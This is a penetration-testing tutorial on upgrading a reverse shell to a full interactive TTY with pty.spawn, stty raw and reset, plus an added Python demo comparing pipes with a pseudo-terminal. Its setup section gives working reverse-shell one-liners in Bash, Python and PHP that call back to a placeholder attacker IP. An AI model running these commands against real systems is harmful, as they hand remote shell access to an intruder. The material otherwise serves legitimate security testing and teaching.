This article will teach you how to upgrade your TTY shell from a reverse connection.
TL;DR
I'm too lazy to read the article, just give me the commands...
In the reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Then press Ctrl+Z (this suspends your local netcat client) and, in your own terminal:
stty size (note the rows and columns it prints)
stty raw -echo;fg
Back in the reverse shell (you will not see what you type until reset has run):
reset
xterm (only if reset asks "Terminal type?")
export TERM=xterm
stty rows 19 columns 125 (use the numbers from stty size)
Using this method gives you a full TTY shell: Ctrl+C is delivered to the remote process instead of killing your listener, tab completion, command history and job control work, and programs that refuse to run without a terminal (su, ssh, vi, less and friends) behave normally.
Getting a reverse shell
To get the initial reverse shell connection you can use these simple techniques below.
Setup a listener
I prefer to use a simple netcat listener whilst working in Kali. Enter this on your machine to set it up:
nc -lnvp 9999
nc = the netcat executable
-l = listen for an incoming connection instead of connecting out
-n = numeric only, no DNS resolution
-v = verbose output (prints the connecting address when the shell comes in)
-p = the local port to listen on; 9999 is the port the target will connect back to
Spawn a reverse connection
This can be done many ways; below are a few common one-liners to get a quick shell back from a system.
*replace <YOUR_IP> and <YOUR_PORT> with the IP of the machine running your listener and the port it listens on (9999 in the listener above). Do not use 127.0.0.1: that would make the target connect to itself.
Bash (the /dev/tcp pseudo-device is a bash feature, so this must run under bash, not plain sh)
bash -i >& /dev/tcp/<YOUR_IP>/<YOUR_PORT> 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<YOUR_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
*use "python" or "python3", whichever is available on the target.
PHP (this assumes the socket lands on file descriptor 3, which is the usual case when php is started from the command line like this; if you get no shell back, try 4, 5 or 6)
php -r '$sock=fsockopen("<YOUR_IP>",<YOUR_PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
More ways to get a reverse shell can be seen here
Upgrading to a full shell
Now you have a connection and a basic (dumb) shell. It's time to upgrade it!
After you get your connection back, the first thing to do is spawn a shell that is attached to a pseudo-terminal (pty).
Below are a few ways to do so. I prefer the Python version whenever Python is available on the target.
Python (my preferred)
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
Python (from inside an interactive interpreter you have landed in)
import os; os.system('/bin/bash')
Sh
/bin/sh -i
Perl
perl -e 'exec "/bin/sh";'
or, from inside a running Perl program:
exec "/bin/sh";
Ruby (from inside irb)
exec "/bin/sh"
Lua
os.execute('/bin/sh')
Note that only pty.spawn actually allocates a pseudo-terminal. The other commands simply start or replace a shell that is still reading and writing the raw socket, so after them steps 2 and 3 below will not give you job control or a working Ctrl+C. If Python is missing, script -qc /bin/bash /dev/null (from util-linux) allocates a pty as well.
*Tip: if you copy and paste these commands, make sure the quotes are plain ASCII ' and " rather than curly typographic quotes, otherwise the shell will reject the command.
Step 1
Spawn a pty in the reverse shell using one of the commands above.
Step 2
Press Ctrl+Z. This suspends the local netcat client and drops you back into your own shell; the remote shell stays alive on the other end of the socket.
In your own terminal enter
stty size
and note down the two numbers it prints (rows first, then columns).
Now enter the next command to put your local terminal into raw mode and bring netcat back to the foreground:
stty raw -echo;fg
raw passes every keystroke (Ctrl+C, tab, arrow keys) straight through to the remote side instead of letting your local terminal driver interpret it, and -echo stops local echoing because the remote pty now echoes for you.
The screen will look slightly off at this point. Type reset and press Enter (you will not see what you type). If reset asks "Terminal type?", answer xterm and press Enter. The remote prompt then comes back cleaned up.
Step 3
Next, export the TERM and SHELL environment variables in the remote shell so that programs know what kind of terminal they are talking to.
Commands
export TERM=xterm-256color
or use
export TERM=xterm
export SHELL=/bin/bash
Now Ctrl+C is delivered to whatever is running in the remote shell instead of killing your netcat client, but there is one more step.
Tell the remote pty the real size of your terminal, using the numbers you noted from stty size:
stty rows 19 columns 125
- replace 19 and 125 with your own rows and columns. Without this the remote side believes the terminal is 0 by 0 and editors and pagers will wrap and redraw incorrectly.
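To see why Step 1 is the essential step and what Step 3's stty rows/columns actually changes, here is an added Python example (not from the original article) that runs the same probe command twice: once through plain pipes, which is what the remote process sees in a bare netcat reverse shell, and once as a child of a freshly allocated pseudo-terminal, the way pty.spawn does it, with the window size set to 19 by 125 through the same TIOCSWINSZ ioctl that stty uses under the hood. The probe command, the function names and the 19 by 125 size are constructed for this example.

```python
import fcntl
import os
import pty
import struct
import subprocess
import termios

# Constructed probe: report whether stdin is a terminal and, if it is,
# print the terminal size exactly as `stty size` does (rows, then columns).
PROBE = ["/bin/sh", "-c",
         'if [ -t 0 ]; then echo tty:yes; stty size; else echo tty:no; fi']


def run_without_pty(argv):
    """Run argv with plain pipes on stdin/stdout, which is what a bare
    `nc` reverse shell gives the remote process: no terminal at all."""
    proc = subprocess.run(argv, stdin=subprocess.DEVNULL,
                          capture_output=True, text=True)
    return proc.stdout


def run_in_pty(argv, rows=19, cols=125):
    """Run argv as a child whose stdin/stdout/stderr are the slave side of
    a new pseudo-terminal (the same thing pty.spawn does for /bin/bash),
    with the pty's window size set to rows x cols, which is exactly what
    `stty rows 19 columns 125` does from inside the upgraded shell.
    Returns everything the child wrote, with the pty's CR-LF undone."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: fd 0/1/2 are already the pty slave. Set the window size
        # before exec so the probe cannot run ahead of it.
        winsize = struct.pack("HHHH", rows, cols, 0, 0)
        fcntl.ioctl(0, termios.TIOCSWINSZ, winsize)
        try:
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)  # only reached if exec itself failed
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 4096)
        except OSError:  # Linux raises EIO once the slave side is closed
            break
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    return b"".join(chunks).decode(errors="replace").replace("\r\n", "\n")


def tty_report(with_pty):
    """Probe output as a list of lines for either transport."""
    out = run_in_pty(PROBE) if with_pty else run_without_pty(PROBE)
    return out.strip().split("\n")


if __name__ == "__main__":
    print("pipes:", tty_report(False))  # ['tty:no']
    print("pty:  ", tty_report(True))   # ['tty:yes', '19 125']
```

The pipes case is the "dumb" shell from the previous section: `[ -t 0 ]` fails, so anything that checks for a terminal (su, sudo, ssh, editors, readline) degrades or refuses to run. Under the pty the same command sees a terminal and the size you configured, which is why the remote bash can offer line editing and job control once Steps 2 and 3 have been done.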
Congratulations!! You now have a fully interactive shell!
Happy cybersecurity penetration testing!